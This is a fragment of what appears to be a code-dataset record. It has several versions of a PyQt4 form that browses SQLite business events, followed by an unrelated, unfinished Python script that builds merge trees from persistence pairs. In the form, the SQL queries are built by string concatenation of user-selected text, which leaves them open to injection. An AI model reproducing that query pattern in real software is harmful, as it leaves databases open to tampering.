sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(5).toString() != 
'':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n\n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1\n self.handleChanged(self.cb_EventType.currentText())\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-4": "from PyQt4 import QtCore, QtGui, QtSql\nimport sqlite3\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n\n def _fromUtf8(s):\n return s\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n 
font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n\n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n\n def getBusinessEventsType(self):\n conn = sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, 
modelInputValue])\n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n\n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1\n self.handleChanged(self.cb_EventType.currentText())\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'KPS_RevisitBusinessEvents.ui'\n#\n# Created: Sun May 18 14:50:49 2014\n# by: PyQt4 UI code generator 4.10.4\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt4 import QtCore, QtGui, QtSql\nimport sqlite3\n\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\nclass Ui_Form(object):\n \n \n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8(\"Form\"))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0;\n self.db = Database()\n \n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern) \n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n \n self.inWork = True\n \n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern) \n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n \n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n \n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n \n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n \n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8(\"tb_EventViewer\"))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n # self.tb_EventViewer.setColumnCount(0)\n # self.tb_EventViewer.setRowCount(0)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8(\"bt_Earlier\"))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n \n \n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8(\"bt_Later\"))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n \n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n 
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8(\"Segoe UI Light\"))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8(\"label\"))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8(\"cb_EventType\")) \n self.cb_EventType.currentIndexChanged['QString'].connect(self.handleChanged) \n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n \n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n \n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8(\"Segoe UI\"))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8(\"label_2\"))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8(\"label_3\"))\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate(\"Form\", \"Revisit business events\", None))\n self.bt_Earlier.setText(_translate(\"Form\", \"<<\", None))\n self.bt_Later.setText(_translate(\"Form\", \">>\", None))\n self.label.setText(_translate(\"Form\", \"Revisit business events\", None))\n self.label_2.setText(_translate(\"Form\", \"Select Event Type\", None))\n \n \n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n # self.cb_Destination.addItems(RH.getLocations())\n \n def getBusinessEventsType(self):\n conn = sqlite3.connect(\"../Database/Business.db\")\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n \n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n\n query.exec_(\"Select * from BusinessEvents a, EventTypes b where b.Event = '\" + text + \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" + str(self.eventSkip) + \",1\")\n recCount = 0;\n \n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" + query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem(\"Origin\")\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\"Select Name from Cities where 
ID = '\" + query.value(3).toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem(\"Destination\")\n modelInputValue = QtGui.QStandardItem(query_Destination.value(0).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Weight\")\n modelInputValue = QtGui.QStandardItem(query.value(4).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Volume\")\n modelInputValue = QtGui.QStandardItem(query.value(5).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Time of Entry\")\n modelInputValue = QtGui.QStandardItem(query.value(6).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Priority\")\n modelInputValue = QtGui.QStandardItem(query.value(7).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Price Per Gram\")\n modelInputValue = QtGui.QStandardItem(query.value(8).toString())\n modelView.appendRow([modelInputItem,modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Price Per CC\")\n modelInputValue = QtGui.QStandardItem(query.value(9).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Company\")\n modelInputValue = QtGui.QStandardItem(query.value(10).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Transport Type\")\n modelInputValue = QtGui.QStandardItem(query.value(11).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Day of the Week\")\n modelInputValue = QtGui.QStandardItem(query.value(12).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Frequency\")\n modelInputValue = QtGui.QStandardItem(query.value(13).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem(\"Duration\")\n modelInputValue = QtGui.QStandardItem(query.value(14).toString())\n modelView.appendRow([modelInputItem,modelInputValue]) \n #modelInputValue = QtGui.QStandardItem('Value')\n # modelView.appendRow([modelInputItem,modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate(\"Form\", \"No Records found\", None))\n self.inWork = False\n else:\n self.label_3.setText(_translate(\"Form\", \"\", None))\n self.inWork = True\n \n self.tb_EventViewer.setModel(modelView)\n \n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n \n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1 \n self.handleChanged(self.cb_EventType.currentText())\n \nclass Database:\n def __init__(self, parent = None):\n self.data = QtSql.QSqlDatabase.addDatabase(\"QSQLITE\")\n self.data.setDatabaseName(\"../Database/Business.db\")\n self.data.open()\n",
"step-ids": [
8,
10,
11,
12,
13
]
}
|
[
8,
10,
11,
12,
13
] |
from helper import *
tree_type = TREE_TYPE_SPLIT
file_name = ''
file_path = ''
split_scalars = {}
visited = {}
adjacency = {}
pairs = {}
index_map = {}
postorder_map = {}
preorder_map = {}
birth = {}
death = {}
string = ''
class Tree(object):
def __init__(self):
self.index = None
self.children = []
self.parent = None
self.label = None
self.pair = None
self.birth = None
self.death = None
self.postorder = None
self.preorder = None
def __str__(self):
return str(self.index)
def initialize_tree(index):
root = Tree()
root.index = index
root.label = split_scalars[index]
root.pair = pairs[index]
# add mapping to dictionary
index_map[index] = root
return root
def add_node(index, parent):
node = Tree()
node.index = index
parent.children.append(node)
node.parent = parent
node.label = split_scalars[index]
node.pair = pairs[index]
# add mapping to dictionary
index_map[index] = node
return node
def compare_nodes(a, b):
# try to sort using the split_scalars
# if they are equal, sort using index value
if split_scalars[a] > split_scalars[b]:
return 1
elif split_scalars[a] == split_scalars[b]:
if a > b:
return 1
else:
return -1
else:
return -1
def traverse(index, parent):
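	# depth-first traversal of the adjacency list, adding children to the tree
	# in increasing order of scalar value (ties broken by node index)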
#print index, split_scalars[index]
visited[index] = True
adjacency[index].sort(compare_nodes)
for node in adjacency[index]:
if not visited[node]:
current = add_node(node, parent)
traverse(node, current)
def add_pairs(node):
if(node == None):
return
else:
node.pair = index_map[pairs[node.index]]
node.birth = index_map[birth[node.index]]
node.death = index_map[death[node.index]]
for child in node.children:
add_pairs(child)
def postorder(node):
	# use a mutable dict so the nested function can update the counter
order = {'index': 1}
def set_order(node):
if(node == None):
return
else:
for child in node.children:
set_order(child)
node.postorder = order['index']
postorder_map[order['index']] = node
order['index'] += 1
set_order(node)
def preorder(node):
	# use a mutable dict so the nested function can update the counter
order = {'index': 1}
def set_order(node):
if(node == None):
return
else:
node.preorder = order['index']
preorder_map[order['index']] = node
order['index'] += 1
for child in node.children:
set_order(child)
set_order(node)
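# Illustrative example: for a root with two leaf children, preorder labels the
# root 1 and the children 2 and 3, while postorder labels the children 1 and 2
# and the root 3.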
def stringify_tree(node):
global string
if(node == None):
return
else:
string += '{'
string += str(node.postorder) + '|'
string += str(node.index) + '|'
string += str(node.label) + '|'
string += str(node.birth.label) + '|'
string += str(node.death.label)
for child in node.children:
stringify_tree(child)
string += '}'
return string
def get_merge_tree():
# Get merge tree path
tree_file_arguments = [tree_type, TREE_INFIX, file_name, CSV_EXTENSION]
tree_file_path = get_output_path(file_path, tree_file_arguments, folder_name = TREES_FOLDER)
# Read merge tree file
with open(tree_file_path, 'rb') as csvfile:
csvfile.readline()
spamreader = csv.reader(csvfile, delimiter=' ')
for r in spamreader:
row = r[0].split(',')
node1 = int(row[0])
node2 = int(row[1])
split_scalars[node1] = float(row[2])
split_scalars[node2] = float(row[3])
visited[node1] = False
visited[node2] = False
if node1 not in adjacency.keys():
adjacency[node1] = []
if node2 not in adjacency.keys():
adjacency[node2] = []
adjacency[node1].append(node2)
adjacency[node2].append(node1)
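	# the root is taken to be the degree-one node whose scalar is lower than
	# its only neighbour (for a split tree, the global-minimum end)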
for i in adjacency.keys():
if len(adjacency[i]) == 1:
if (split_scalars[i] < split_scalars[adjacency[i][0]]):
root = i
return root
def get_persistent_pairs():
# Get persistence pairs
pairs_file_arguments = [tree_type, PAIRS_INFIX, file_name, CSV_EXTENSION]
pairs_file_path = get_output_path(file_path, pairs_file_arguments, folder_name = PAIRS_FOLDER)
with open(pairs_file_path, 'rb') as persistence_pairs:
persistence_pairs.readline()
spamreader = csv.reader(persistence_pairs, delimiter=' ')
for r in spamreader:
row = r[0].split(',')
node1 = int(row[0])
node2 = int(row[1])
#if (node1 in split_scalars.keys()) and (node2 in split_scalars.keys()):
# there will be pairs that do not exist in the merge tree
# they will be removed/ignored subsequently
pairs[node1] = node2
pairs[node2] = node1
# add birth and death values of nodes to dictionaries
birth[node1] = node1
death[node1] = node2
birth[node2] = node1
death[node2] = node2
def write_tree(node):
tuple_file_arguments = [file_name, TXT_EXTENSION]
tuple_file_path = get_output_path(file_path, tuple_file_arguments, folder_name = TUPLES_FOLDER)
tuple_file = open(tuple_file_path, 'w')
fieldnames = ['timestep', 'postorder', 'value', 'birth', 'death']
writer = csv.writer(tuple_file, delimiter=',')
writer.writerow(fieldnames)
def pretty_print_tree(node):
if(node == None):
return
else:
timestep = file_name.split('tv_')[1]
values = [timestep, node.postorder, node.label, node.birth.label, node.death.label]
writer.writerow(values)
for child in node.children:
pretty_print_tree(child)
pretty_print_tree(node)
def print_treemap(node):
processed_nodes = {}
treemap_string = {}
treemap_value = {}
treemap_parent = {}
